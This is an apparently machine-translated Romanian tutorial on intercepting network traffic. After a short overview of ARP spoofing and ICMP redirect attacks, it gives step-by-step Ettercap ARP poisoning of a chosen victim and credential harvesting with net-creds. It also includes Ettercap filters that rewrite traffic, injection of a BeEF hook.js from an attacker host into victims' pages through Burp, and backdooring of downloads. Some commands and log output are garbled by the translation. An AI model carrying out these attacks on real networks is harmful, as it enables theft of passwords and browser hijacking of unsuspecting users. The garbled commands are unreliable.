Acasă › Instalare și configurare › Hackerii îl folosesc pentru a redirecționa traficul. Metode de atac al hackerilor. Falsificarea datelor cu Burp

Hackerii îl folosesc pentru a redirecționa traficul. Metode de atac al hackerilor. Falsificarea datelor cu Burp

Metode de interceptare a traficului de rețea

Ascultarea rețelei folosind programe de analiză a rețelei este prima, cea mai mare într-un mod simplu interceptarea datelor.

Pentru a vă proteja împotriva interceptării rețelei, utilizați programe speciale, de exemplu, AntiSniff, care sunt capabile să identifice computerele din rețea care ascultă traficul de rețea.

Pentru a-și rezolva problemele, programele antisniffer folosesc un semn special al prezenței dispozitivelor de ascultare în rețea - placa de rețea a computerului sniffer trebuie să fie într-un mod special de ascultare. În modul de ascultare, computerele din rețea reacționează într-un mod special la datagramele IP trimise gazdei care este testată. De exemplu, gazdele care ascultă procesează de obicei tot traficul de intrare, nu doar datagramele trimise la adresa gazdei. Există și alte semne care indică un comportament suspect al gazdei pe care AntiSniff le poate recunoaște.

Fără îndoială, interceptarea este foarte utilă din punctul de vedere al unui atacator, deoarece permite obținerea unei mulțimi de informații utile - parole transmise prin rețea, adrese ale calculatoarelor din rețea, date confidențiale, scrisori etc. Cu toate acestea, interceptarea simplă nu permite unui hacker să interfereze cu comunicarea în rețea dintre două gazde pentru a modifica și a corupe datele. Pentru a rezolva o astfel de problemă, este necesară o tehnologie mai complexă.

Orez. 1 Cereri ARP false

Să vedem cum un hacker poate folosi ARP pentru a intercepta comunicațiile de rețea dintre gazdele A și B.

Pentru a intercepta traficul de rețea între gazdele A și B, hackerul își impune adresa IP acestor gazde, astfel încât A și B să folosească această adresă IP falsificată atunci când schimbă mesaje. Pentru a-și impune adresa IP, hackerul efectuează următoarele operațiuni.

Atacatorul determină adresele MAC ale gazdelor A și B, de exemplu, folosind comanda nbtstat din pachetul W2RK.
Atacatorul trimite mesaje către adresele MAC identificate ale gazdelor A și B, care sunt răspunsuri ARP falsificate la solicitările de rezolvare a adreselor IP ale gazdelor la adresele MAC ale computerelor. Gazda A este informată că adresa IP a gazdei B corespunde adresei MAC a computerului atacatorului; gazda B este informată că adresa IP a gazdei A corespunde, de asemenea, adresei MAC a computerului atacatorului.
Gazdele A și B stochează adresele MAC primite în memoria cache ARP și apoi le folosesc pentru a trimite mesaje unul altuia. Deoarece adresele IP A și B corespund adresei MAC a computerului atacatorului, gazdele A și B comunică fără bănuială printr-un intermediar care poate face orice cu mesajele lor.

Pe rețelele UNIX, acest tip de atac de cerere ARP falsificat poate fi implementat folosind utilitare de sistem pentru monitorizarea și gestionarea traficului de rețea, de exemplu, arpredirect. Din păcate, astfel de utilități de încredere nu par să fie implementate în rețelele Windows. De exemplu, pe site-ul web NTsecurity puteți descărca utilitarul GrabitAII, prezentat ca un instrument pentru redirecționarea traficului între gazdele rețelei. Cu toate acestea, o verificare de bază a funcționalității utilitarului GrabitAII arată că succesul complet în implementarea funcțiilor sale este încă departe.

Pentru a intercepta traficul de rețea, un atacator poate falsifica adresa IP reală a unui router de rețea cu propria sa adresă IP, făcând acest lucru, de exemplu, folosind mesaje de redirecționare ICMP falsificate. Gazda A trebuie, conform RFC-1122, să perceapă mesajul de redirecționare primit ca un răspuns la o datagramă trimisă către o altă gazdă, de exemplu, B. Gazda A își determină acțiunile asupra mesajului de redirecționare pe baza conținutului mesajului de redirecționare primit, iar dacă redirecționarea datagramei este specificată în Redirecționare de la A la B de-a lungul unei noi rute, aceasta este exact ceea ce va face gazda A.

Orez. 2 Dirijare falsă

Pentru a efectua rutarea falsă, atacatorul trebuie să cunoască câteva detalii despre organizație retea locala, în care se află gazda A, în special, adresa IP a routerului prin care se trimite traficul de la gazda A la B. Știind acest lucru, atacatorul va genera o datagramă IP în care adresa IP a expeditorului este definită ca IP-ul routerului. adresa, iar destinatarul este specificată gazda A. De asemenea, în datagramă este inclus un mesaj de redirecționare ICMP cu câmpul de adresă al noului router setat la adresa IP a computerului atacatorului. După ce a primit un astfel de mesaj, gazda A va trimite toate mesajele la adresa IP a computerului atacatorului.

Pentru a vă proteja împotriva unui astfel de atac, ar trebui să dezactivați (de exemplu, folosind un firewall) procesarea mesajelor de redirecționare ICMP pe gazda A, iar comanda tracert (în Unix aceasta este comanda tracerout) poate dezvălui adresa IP a computerului atacatorului. . Aceste utilitare sunt capabile să găsească o rută suplimentară care a apărut în rețeaua locală care nu a fost prevăzută în timpul instalării, cu excepția cazului în care, desigur, administratorul de rețea este vigilent.

Exemplele de mai sus de interceptări (la care capacitățile atacatorilor sunt departe de a fi limitate) ne convinge de necesitatea de a proteja datele transmise prin rețea dacă datele conțin informații confidențiale. Singura metodă de protecție împotriva interceptărilor traficului de rețea este utilizarea programelor care implementează algoritmi criptografici și protocoale de criptare și împiedică dezvăluirea și înlocuirea informațiilor secrete. Pentru a rezolva astfel de probleme, criptografia oferă mijloacele de a cripta, semna și verifica autenticitatea mesajelor transmise prin protocoale securizate.

Implementarea practică a tuturor metodelor criptografice pentru protejarea schimbului de informații este asigurată de rețele VPN(Virtual Private Network - Rețele private virtuale).

Interceptarea conexiunii TCP

Cel mai sofisticat atac de interceptare a traficului de rețea ar trebui considerat captura de conexiune TCP (deturnarea TCP), atunci când un hacker întrerupe sesiunea curentă de comunicare cu gazda generând și trimițând pachete TCP către gazda atacată. Apoi, folosind capacitatea protocolului TCP de a restabili o conexiune TCP întreruptă, hackerul interceptează sesiunea de comunicare întreruptă și o continuă în locul clientului deconectat.

Protocolul TCP (Transmission Control Protocol) este unul dintre protocoalele de transport de bază. Nivelul OSI, permițându-vă să stabiliți conexiuni logice pe un canal de comunicare virtual. Pe acest canal, pachetele sunt transmise și recepționate cu secvența lor înregistrată, fluxul de pachete este controlat, retransmisia pachetelor distorsionate este organizată, iar la sfârșitul sesiunii canalul de comunicație este întrerupt. TCP este singurul protocol protocol de bază din familia TCP/IP, care are un sistem avansat de identificare și conectare a mesajelor.

Prezentare generală a sniffer-urilor de pachete software

Toate snifferele software pot fi împărțite în două categorii: sniffer-uri care acceptă lansarea de la Linie de comanda, și adulmecă cu o interfață grafică. Cu toate acestea, observăm că există sniffer-uri care combină ambele aceste capacități. În plus, snifferele diferă între ele prin protocoalele pe care le suportă, profunzimea analizei pachetelor interceptate, capacitatea de a configura filtre și posibilitatea de compatibilitate cu alte programe.

De obicei fereastra oricărui sniffer cu interfata grafica este format din trei zone. Prima dintre ele afișează datele rezumate ale pachetelor interceptate. De obicei, această zonă afișează un minim de câmpuri și anume: timpul de interceptare a pachetului; Adresele IP ale expeditorului și destinatarului pachetului; Adresele MAC ale expeditorului și destinatarului pachetului, adresele portului sursă și destinație; tip de protocol (nivel de rețea, transport sau aplicație); câteva informații rezumative despre datele interceptate. A doua zonă afișează informații statistice despre pachetul individual selectat, iar în cele din urmă a treia zonă afișează pachetul în formă de caractere hexazecimale sau ASCII.

Aproape toate snifferele de pachete vă permit să analizați pachetele decodificate (de aceea sniffer-urile de pachete sunt numite și analizoare de pachete sau analizoare de protocol). Sniffer-ul distribuie pachetele interceptate pe straturi și protocoale. Unele sniffer-uri de pachete sunt capabile să recunoască protocolul și să afișeze informațiile capturate. Acest tip de informații sunt de obicei afișate în a doua zonă a ferestrei sniffer. De exemplu, orice sniffer poate recunoaște protocolul TCP, iar sniffer-ii avansati pot determina ce aplicație a generat acest trafic. Majoritatea analizoarelor de protocoale recunosc peste 500 de protocoale diferite și le pot descrie și decodifica după nume. Cu cât un sniffer poate decoda și afișa mai multe informații pe ecran, cu atât mai puține vor trebui să fie decodate manual.

O problemă pe care o pot întâlni snifferii de pachete este incapacitatea de a identifica corect un protocol folosind un alt port decât portul implicit. De exemplu, pentru a îmbunătăți securitatea, unele aplicații bine-cunoscute pot fi configurate să utilizeze alte porturi decât porturile implicite. Deci, în loc de portul tradițional 80 rezervat serverului web, acest serverÎl puteți reconfigura forțat la portul 8088 sau oricare altul. Unele analizoare de pachete în această situație nu sunt capabile să determine corect protocolul și să afișeze doar informații despre protocolul de nivel inferior (TCP sau UDP).

Există software sniffer care vin cu module analitice software ca pluginuri sau module încorporate care vă permit să creați rapoarte cu informații analitice utile despre traficul interceptat.

O altă caracteristică caracteristică a majorității analizoarelor de pachete software este capacitatea de a configura filtre înainte și după capturarea traficului. Filtrele selectează anumite pachete din traficul general în funcție de un criteriu dat, ceea ce vă permite să scăpați de informațiile inutile atunci când analizați traficul.

Alternative la Ettercap

Ettercap este cel mai popular software de atac man-in-the-middle, dar este cel mai bun? Pe parcursul întregului instrucțiuni, veți vedea că Ettercap nu este aproape niciodată folosit singur, că unul sau altul program este întotdeauna construit cu el într-un lanț de procesare a traficului. Poate că acest lucru adaugă flexibilitate; în general, această abordare este baza UNIX - un program îndeplinește o sarcină, iar utilizatorul final combină diverse programe pentru a obține rezultatul dorit. Cu această abordare, codul programului este mai ușor de întreținut; din astfel de „cărămizi” în miniatură puteți construi un sistem de orice complexitate și flexibilitate. Cu toate acestea, a avea cinci console deschise cu sarcini diferite, ale căror programe sunt destinate să obțină un singur rezultat, nu este foarte convenabil, este pur și simplu mai complicat, există posibilitatea de a face o greșeală la un moment dat și întregul configurat. sistemul va funcționa în zadar.

Net-Creds adulmecă:

Adrese URL vizitate
Solicitări POST trimise
autentificări/parole din formularele HTTP
autentificare/parole pentru autentificarea HTTP de bază
Căutări HTTP
Autentificare/parole FTP
Login-uri/parole IRC
Login-uri/parole POP
Autentificare/parole IMAP
Autentificare/parole Telnet
Autentificare/parole SMTP
Șirul comunității SNMP
toate protocoalele NTLMv1/v2 acceptate, cum ar fi HTTP, SMB, LDAP etc.
Kerberos

O selecție bună de cele interceptate, iar rețeaua în derivă este mai simplă în acest sens - arată doar imagini interceptate.

Comutați aparatul în modul de redirecționare.

Echo „1” > /proc/sys/net/ipv4/ip_forward

Lansați Ettercap cu o interfață grafică (-G):

Ettercap-G

Acum selectați Gazde, există un sub-element Scanare pentru gazde. După finalizarea scanării, selectați Lista gazde:

Ca Target1, selectați routerul (Add to Target 1), ca Target2 selectați dispozitivul pe care îl veți ataca (Add to Target 2).

Dar aici poate apărea prima problemă, mai ales dacă sunt multe gazde. În diverse instrucțiuni, inclusiv în videoclipul prezentat mai sus, autorii se urcă în mașina țintă (toată lumea, dintr-un motiv oarecare, are Windows) și, folosind comanda, se uită la IP-ul acestei mașini în rețeaua locală. De acord, această opțiune este inacceptabilă în condiții reale.

Dacă scanați folosind , puteți obține câteva Informații suplimentare despre gazde, mai precis, despre producătorul plăcii de rețea:

Nmap -sn 192.168.1.0/24

Dacă datele încă nu sunt suficiente, atunci puteți face o scanare pentru a determina sistemul de operare:

Nmap -O 192.168.1.0/24

După cum putem vedea, mașina cu IP 192.168.1.33 s-a dovedit a fi Windows, dacă acesta nu este un semn de sus, atunci ce este? 😉 LOL

Acesta este ceea ce adăugăm ca al doilea obiectiv.

Acum accesați elementul de meniu Mitm. Acolo, selectați Otrăvire ARP... Bifați caseta pentru conexiuni la distanță Sniff.

Începem să recoltăm, într-o fereastră lansăm

Net-cred-uri

în altul (ambele programe pot fi rulate fără opțiuni)

Plasa in deriva

Colectarea datelor a început imediat:

În partea dreaptă, driftnet a deschis o altă fereastră în care arată imaginile interceptate. În fereastra net-creds vedem site-uri vizitate și parole interceptate:

1.2 Ettercap + Burp Suite
3. Vizualizați datele (site-urile vizitate și parolele capturate) în Ettercap

În meniul View avem acces la filele Conexiuni și Profiluri. De asemenea, puteți bifa caseta Rezolvare adrese IP. Conexiunile sunt, desigur, conexiuni. Ettercap colectează profiluri în memorie pentru fiecare gazdă pe care o descoperă. Utilizatorii și parolele sunt colectate acolo. În acest caz, profilurile cu date de cont capturate (parole) sunt marcate cu o cruce:

Nu este nevoie să vă bazați prea mult pe profiluri - de exemplu, login-urile și parolele interceptate pentru FTP și alte servicii sunt marcate, pentru care programul poate interpreta clar informațiile primite ca acreditări. Aceasta nu include, de exemplu, datele de autentificare de bază, datele de conectare și parolele introduse în formularele web.

În Connections, cele mai promițătoare date sunt marcate cu un asterisc:

Puteți face dublu clic pe aceste intrări pentru a vedea detalii:

Pentru a nu căuta aceste stele în listă, puteți sorta după acest câmp și toate vor apărea în partea de sus sau de jos:

Autentificare de bază prinsă:

Parola de conectare pentru Yandex (evidențiată mai jos):

Acestea sunt acreditările interceptate pentru VKontakte:

De asemenea, cele mai interesante date sunt colectate în consola inferioară:

Dacă doriți să salvați rezultatele programului, atunci utilizați aceste opțiuni (specificați cheile când porniți Ettercap:

Opțiuni de înregistrare: -w, --write scrieți datele capturate în pcapfile -L, --log scrieți tot traficul în acest -l, --log-info scrieți numai informații pasive în acest -m, --log-msg scrieți toate mesajele în acest -c, --compress utilizează compresia gzip pentru fișierele jurnal

4. Înlocuirea datelor din mers în Ettercap
4.1 Utilizarea filtrelor personalizate Ettercap

Notă: În ciuda tuturor testelor, filtrele Ettercap încă nu au funcționat pentru mine. Este greu de înțeles dacă este o chestiune de mâini, caracteristici hardware sau o eroare în programul în sine... Dar pentru versiunea 0.8.2 (cea mai recentă în acest moment), există un raport de eroare despre problemele cu filtrele. În general, judecând după rapoartele de erori și forumuri, filtrele fie căd des sau nu au funcționat deloc de mult timp. Există o ramură în care s-au făcut modificări cu 5 luni în urmă https://github.com/Ettercap/ettercap/tree/filter-improvements, adică. filtru-îmbunătățiri (cu îmbunătățiri ale filtrului). Atât pentru această ramură, cât și pentru versiunea din depozit s-au făcut o mare varietate de teste, s-au testat diverse filtre în diferite condiții, s-a cheltuit mult timp, dar nu a existat niciun rezultat. Apropo, pentru a instala versiunea de îmbunătățire a filtrelor în Kali Linux, trebuie să faceți acest lucru:

Sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENCSABLE_PDF_DO =On ../ make sudo make install

În general, dacă filtrele tale nu funcționează, atunci nu ești singur. În instrucțiunile despre Ettercap, nu pot sări peste subiectul filtrelor, așa că vor fi discutate în orice caz.

Până acum am folosit Ettercap pentru spoofing ARP. Aceasta este o aplicație foarte superficială. Datorită filtrelor personalizate, putem interveni și schimba traficul din mers. Filtrele trebuie să fie conținute în fișiere separate și trebuie compilate folosind programul Etterfilter înainte de utilizare. Deși documentația către care este dat linkul pare puțină, dar cuplată cu exemplele date mai jos, vă va permite să scrieți filtre destul de interesante.

Să creăm primul nostru filtru, acesta va înlocui toate imaginile cu acesta:

Într-un fișier numit img_replacer.filter copie:

Dacă (ip.proto == TCP && tcp.dst == 80) ( dacă (căutare(DATA.data, „Accept-Encoding”)) ( înlocuiți(„Accept-Encoding”, „Accept-Rubish!”); # notă: șirul de înlocuire are aceeași lungime ca și mesajul original ("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( înlocuiți("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); înlocuiți("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); înlocuiți("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); înlocuiți("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Run.\n"); )

Compilați fișierul:

Etterfilter img_replacer.filter -o img_replacer.ef

Rezultatele compilației:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 tabele de protocol încărcate: DATE DECODATE udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 constante încărcate: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP Fișier sursă PPTP ARPPOE Paring „img_replacer.filter” terminat. Desfășurarea meta-arborelui s-a terminat. S-a făcut conversia etichetelor în decalaje reale. S-a terminat scrierea ieșirii în „img_replacer.ef”. -> Script codificat în 18 instrucțiuni.

Comutatorul -F spune programului să încarce filtrul din fișierul care urmează comutatorului. După compilare, numele noului nostru fișier cu filtrul este img_replacer.ef, deci comanda ia forma:

Ettercap -G -F img_replacer.ef

Notă: atunci când monitorizați traficul web, pachetele pe care le vedeți pot fi în formă criptată. Pentru munca eficienta filtre, Ettercap are nevoie de trafic sub formă text simplu. Conform unor observații, tipul de codificare pe care îl folosesc paginile web este „Accept-Encoding: gzip, deflate”

Mai jos este un filtru care suprascrie codificarea, forțând comunicarea sub formă de text simplu:

Dacă (ip.proto == TCP && tcp.dst == 80) ( dacă (căutare(DATA.data, "gzip")) ( înlocuiți ("gzip", " "); # notă: patru spații în șirul înlocuit msg ("gzip albit\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( dacă (căutare(DATA.data, "deflate")) ( înlocuiți ("deflate", " "); # notă: șapte spații în linia înlocuită msg("dezumflare albită\n"); ) )

Sintaxa pentru scrierea filtrelor este descrisă în detaliu, apoi mai sunt câteva exemple:

# înlocuirea textului într-un pachet: if (ip.proto == TCP && search(DATA.data, "lol"))( replace ("lol", "smh"); msg ("filter run"); ) # show mesaj , dacă portul tcp este 22 if (ip.proto == TCP) ( dacă (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # scrieți întregul trafic telnet, executați de asemenea ./program pentru fiecare pachet dacă (ip.proto == TCP) ( dacă (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ) ) # înregistrează tot traficul, cu excepția http dacă (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( jurnal (DATA.data , "./logfile.log"); ) # unele operațiuni pe sarcina utilă a pachetului dacă (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = " modificat"; DATE .data + 20 = 0x4445; ) # aruncați toate pachetele care conțin „ettercap” if (search(DECODED.data, „ettercap”)) ( msg(„cineva vorbește despre noi...\n”) ; drop( ); kill(); ) # înregistrează pachetele ssh decriptate care se potrivesc cu expresia regulată if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # distrugerea pachetelor if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Înlocuirea datelor folosind Burp

Lansăm Ettercap și Burp așa cum este descris în paragraful 1.2 sau în paragraful 2.2.

În Burp, accesați Proxy -> Opțiuni. Găsim Match and Replace acolo. Faceți clic pe Adăugați pentru a adăuga o nouă regulă.

Antetul cererii este antetul cererii
Corpul solicitării - organismul solicitării
Antet răspuns - antet răspuns
Corp de răspuns - corp de răspuns
Solicitare nume parametru - Solicitare nume parametru
Solicitați valoarea parametrului - Solicitați valoarea parametrului
Prima linie a cererii - Prima linie a cererii

Dacă trebuie să modificați datele transmise prin metoda GET, atunci acest lucru se aplică antetelor.

În markup HTML există, de asemenea, un astfel de lucru ca head (etichetă head). Cele menționate mai sus nu au nimic de-a face cu acest titlu. Un pic mai sus vorbim despre antetele pachetelor. Dacă doriți să schimbați conținutul Pagini HTML, atunci ar trebui să selectați întotdeauna Corpul răspunsului în loc de Antetul cererii, chiar dacă veți modifica conținutul etichetei head (de exemplu, titlul).

Dacă nu sunteți familiarizat cu expresii obisnuite, atunci, în principiu, nu este nimic de care să vă faceți griji: HTML iartă multe, iar ceea ce nu înțelege, pur și simplu ignoră - îl puteți folosi. Dacă știi să folosești expresiile regulate, atunci te respect.)))

De exemplu, să creăm o nouă regulă, schimbând antetul Cererii în Corpul răspunsului. În regula în sine ne vom schimba

Fara titlu

Bifați caseta de potrivire Regex.

Acum, pe toate site-urile (fără HTTPS), titlul va fi Fără titlu:

Introduceți o linie arbitrară după eticheta body (va fi prima linie din text). Antetul cererii este schimbat în Corpul răspunsului. Noi schimbăm

Bifați caseta de potrivire Regex.

În colțul din dreapta sus (în funcție de aspect) apare inscripția „Sunt cool!”. Puteți insera CSS, cod JavaScript, orice text - orice. În general, puteți elimina totul din pagină și apoi umpleți-l cu propriul conținut - totul depinde de imaginația dvs.

Ideea a fost de a modifica ușor fiecare formular, astfel încât datele să fie trimise către serverul original și către serverul atacatorului (implementați multi-submit pentru fiecare formular). Dar având în vedere că, dacă datele transmise nu sunt criptate și avem acces la ele, atunci le vedem deja, nu este nevoie să le trimitem la niciun server. Cu toate acestea, dacă cineva are nevoie de un exemplu cu adevărat funcțional de trimitere a datelor de la un formular către mai multe servere simultan.

5. Conectare la BeEF

Pentru a începe să folosim capacitățile BeEF, trebuie să încorporam un fișier JavaScript în codul HTML, de obicei o linie ca:

Următoarele două metode diferă doar prin metoda de încorporare a acestui șir.

5.1 Conectarea BeEF folosind filtre Ettercap

[secțiunea va fi pregătită mai târziu]

5.2 Conectarea BeEF cu Burp

Trebuie să începeți exact așa cum este scris în paragraful 4.2. Numai în loc să înlocuim antetele și să adăugăm text pe site, vom implementa codul JavaScript sub forma unei linii:

În cazul meu, acest fișier este disponibil pe IP 192.168.1.36 pe portul 3000. Fișierul se numește hook.js (poate fi modificat în setări). Acestea. în cazul meu, trebuie să injectez linia:

Acest lucru se poate face, de exemplu, prin crearea unei noi reguli, schimbând antetul Cererii în Corpul răspunsului. Înlocuirea trebuie să aibă loc în codul HTML în sine

Grozav, când deschideți orice site web care nu are HTTPS, codul JavaScript este inserat în codul HTML, ceea ce vă permite să colectați informații printr-un browser conectat și să efectuați diverse atacuri:

6. Infecția cu ușile din spate

Puteți înlocui și infecta fișierele executabile folosind atât filtre Ettercap [care din anumite motive nu mai funcționează] cât și folosind aplicații terță parte. De exemplu, BDFProxy poate face acest lucru din mers. Din nefericire, BDFProxy este încă răvășit de actualizarea Backdoor Factory din aprilie 2016: pachetul libmproxy a fost redenumit mitmproxy în Python. Pentru BDFProxy, pachetul libmproxy este o dependență necesară; fără acest pachet, programul nu va porni. Prin urmare, acum, înainte de „repararea” BDFProxy, este imposibil să îl utilizați, deoarece chiar și cu Backdoor Factory instalat, programul BDFProxy se plânge de absența bibliotecii libmproxy...

O operațiune similară se poate face cu Burp Suite. Este prezentat algoritmul pas cu pas; nu are sens să-l rescrieți din nou în această secțiune.

7. Utilizarea pluginurilor Ettercap

Puteți găsi informații despre pluginurile Ettercap. Există destul de multe plugin-uri; cele descrise mai jos mi se par cele mai interesante.

Pluginurile pot fi conectate la lansarea Ettercap, există o opțiune pentru aceasta:

P, --plugin rulează acest lucru

Pluginurile pot fi încărcate și din GUI:

[MATERIAL ÎN PREGĂTIRE]

7.1 arp_cop

Raportează activitatea ARP suspectă prin monitorizarea pasivă a cererilor/răspunsurilor ARP. Poate raporta încercări de otrăvire ARP sau simple conflicte IP sau modificări IP. Dacă construiți o listă inițială de gazde, pluginul va funcționa mai precis.

Ettercap -TQP arp_cop //

Un exemplu de detectare reală a falsificării ARP:

Extinde

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // parola pentru mial: ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Ascultare pe: eth0 -> 08:00:27:A3:08:4A 192.168.1.36/ 255.255.255.0 fe80::a00:27ff:fea3:84a/64 Disecția SSL necesită un script valid „redir_command_on” în fișierul etter.conf Privilegii scăzute la EUID 65534 EGID 65534... 33 plugin-uri de monitorizare a protocolului 420 plugin-uri de monitorizare de porturi 420 mac amprenta furnizorului 1766 amprenta sistemului de operare tcp 2182 servicii cunoscute Randomizarea 255 de gazde pentru scanare... Scanarea întregii mască de rețea pentru 255 de gazde... * |====== =============== =============================>| 100,00 % 3 gazde adăugate la lista de gazde... Se pornește sniffing unificat... Numai text Interfață activată... Apăsați „h” pentru ajutor inline. Se activează pluginul arp_cop... arp_cop: pluginul rulează... arp_cop: (gazdă nouă ) 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface că este 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface că este 192.168.1.1.192.168.1.1. fi 192.168.1.1 arp_cop: ( AVERTISMENT ) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.168.1 arp_cop: 192.168.1.35.1 RNING) 192.168.1.35 se preface fi 192.168 .1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface că este 192.168.1.35 se preface că este 192.168.1.1.192.168.1.18 192.1 68.1.1 arp_cop: ( AVERTISMENT) 192.168 .1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface că este 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.168.1 arp_cop: 192.168.1.35.1 ARNING) 192.1 68.1.35 se preface fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface că este 192.168.1.1 se preface că este 192.168.1.1 arp.168.1.1. 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.168.1.168.1.35.1 arp_cop: ARNING) 192.168.1.3 5 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.35 a fi 192.168.1.1.192.168.1.1. 192.168.1.1 arp_cop : ( AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1 se preface ca ar fi 1.68.1.35.1. ING) 192.168.1.35 se preface a fi 192. 168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (ATENTIE) 192.168.1.35 168.1.1 arp_cop: (AVERTISMENT ) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 a fi 192.168.1.16 arp_cop: ) 192.168.1.35 se preface a fi 192.168 1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (ATENȚIE) .192.192.152 8.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi 192.168.1.1 arp_cop: (AVERTISMENT) 192.168.1.35 se preface a fi.1681912.168.1.35. 192.16 8.1.35 se preface a fi 192.168 .1.1............................

7.2 adăugare automată

Va adăuga automat noi victime pe măsură ce se conectează la atacul de otrăvire ARP mitm. Acesta caută cereri ARP în rețeaua locală și, dacă este detectat, pluginul va adăuga gazda la lista de victime dacă lista a fost specificată ca ȚINTĂ. O gazdă este adăugată atunci când o solicitare arp este vizibilă din ea.

7.3 chk_poison

Verifică dacă modulele arp etch din ettercap au succes. Trimite pachete de eco ICMP falsificate tuturor victimelor momeli, pretinzând că sunt fiecare victimă. Poate prinde un răspuns ICMP cu adresa noastră MAC ca destinație, ceea ce înseamnă că momeala între cele două ținte are succes. Verifică ambele căi ale fiecărei conexiuni.

7.4 dns_spoof

Acest plugin întrerupe solicitările DNS și răspunde cu un răspuns falsificat (fals). Puteți alege la ce adresă ar trebui să răspundă pluginul prin editarea fișierului etter.dns. Pluginul interceptează cererile A, AAAA, PTR, MX, WINS, SRV și TXT. Dacă a fost o solicitare A, atunci numele este căutat în fișier și adresa IP este returnată (puteți folosi metacaractere în nume).

Același lucru este valabil și pentru cererile AAAA.

7.5 find_conn

Un plugin foarte simplu care ascultă solicitările ARP pentru a vă arăta toate țintele cu care gazda dorește să comunice. De asemenea, vă poate ajuta să găsiți adrese pe rețele LAN necunoscute.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Încearcă să identifice pachetele ettercap trimise către LAN. Poate fi util pentru a identifica pe cineva care încearcă să folosească ettercap. Nu vă bazați 100% pe el, deoarece testele funcționează numai pe anumite secvențe/numere de identificare.

7.7 scan_poisoner

